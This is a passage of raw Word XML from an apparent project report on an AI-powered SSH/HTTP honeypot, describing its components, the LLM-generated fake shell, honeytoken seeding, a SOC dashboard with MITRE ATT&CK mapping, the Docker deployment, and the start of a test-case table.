          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SSH Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AsyncSSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HTTP Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FastAPI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AI Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FastAPI + Transformers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQLite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sandbox Store</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FastAPI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQLite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dashboard Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FastAPI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQLite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dashboard Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TypeScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Next.js + React</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkStart w:id="49" w:name="ssh-frontend-implementation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 SSH Frontend Implementation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The SSH frontend is built using AsyncSSH, a Python implementation of the SSHv2 protocol. Key implementation features:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication Handler:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Accepts any username/password combination with probabilistic acceptance logic to mimic real SSH behavior. After 3-5 attempts, there is a 40% chance of acceptance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Session Management:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">UUID-based session tracking with background task for geolocation and Slack alerting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Command Processing:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Commands are forwarded to the AI Engine via REST API while maintaining a local command history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Intelligence Integration:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Every connection triggers a lookup against AbuseIPDB API for reputation scoring.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="49"/>
    <w:bookmarkStart w:id="50" w:name="http-frontend-implementation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 HTTP Frontend Implementation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The HTTP frontend uses FastAPI with catch-all routes to handle any incoming HTTP request. It identifies scanner behavior through User-Agent and request pattern analysis, forwarding suspicious requests to the AI Engine.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkStart w:id="51" w:name="ai-engine-implementation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 AI Engine Implementation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The AI Engine integrates with DeepSeek V4 Flash for response generation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Context-Aware Prompting:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Constructs detailed prompts incorporating session state, command history, and current command.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Response Caching:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5-minute TTL cache for identical commands to reduce latency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IOC Extraction:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Uses regex patterns and NER to identify IPs, domains, URLs, hashes, and tool signatures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">170+ regex patterns mapping commands to specific MITRE techniques with confidence scores across all 14 tactics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fallback Handling:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Returns generic system responses if the AI API is unavailable.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="51"/>
    <w:bookmarkStart w:id="52" w:name="sandbox-state-store-implementation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.5 Sandbox State Store Implementation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The sandbox store uses SQLite with a comprehensive schema supporting:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Filesystem Table:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Path-based storage with content, permissions, and timestamps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Process Table:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Simulated running processes with PIDs, names, and states.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Log Table:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">System log generation (/var/log/auth.log, syslog).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">History Table:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Per-session bash command history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Seeds:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Pre-populated corporate data as honeytokens.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkStart w:id="53" w:name="dashboard-implementation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.6 Dashboard Implementation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The SOC dashboard is built as a Next.js application with React and TypeScript, featuring:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Live Sessions View:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Real-time table of active attacker sessions with risk scoring (Critical/High/Medium/Low).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Metrics Stats:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">KPIs including session count, unique IPs, IOC count, and average session length.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Heatmap:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">D3.js-powered world map with geoNaturalEarth1 projection, coloring countries by attack frequency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Interactive technique cards with links to attack.mitre.org, top tactics breakdown.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Session Reports:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Detailed per-session views with command history, IOC timeline, and MITRE techniques.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkStart w:id="54" w:name="deployment-configuration"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.7 Deployment Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All components are containerized with Docker and orchestrated via Docker Compose:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">services:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  sandbox-store:     # Port 8001 — SQLite database + REST API</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ai-engine:         # Port 8002 — AI inference service</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ssh-frontend:      # Port 2222 — SSH honeypot</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  http-frontend:     # Port 8080 — HTTP honeypot</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  dashboard-backend: # Port 8003 — Dashboard API</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  dashboard-frontend:# Port 3000 — Next.js frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Features: health checks for all containers, persistent data volumes, network segmentation (internal vs. DMZ), environment variable injection.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="54"/>
    <w:bookmarkEnd w:id="55"/>
    <w:bookmarkStart w:id="60" w:name="chapter-6-testing-and-evaluation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 6: Testing and Evaluation</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="56" w:name="testing-strategy"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Testing Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Unit Testing:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Individual functions tested in isolation for each component.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Integration Testing:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Service-to-service communication verified across all interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">End-to-End Testing:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Full attacker workflow tested from SSH connection through AI response to dashboard visibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Manual Security Testing:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Real SSH client penetration attempts by team members.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="56"/>
    <w:bookmarkStart w:id="57" w:name="test-cases-and-results"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Test Cases and Results</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1643"/>
        <w:gridCol w:w="2540"/>
        <w:gridCol w:w="2540"/>
        <w:gridCol w:w="1195"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Command / Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SSH Connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ssh root@localhost -p 2222</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Connection accepted, banner displayed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Command Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">whoami; ls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Realistic output returned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AI Generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
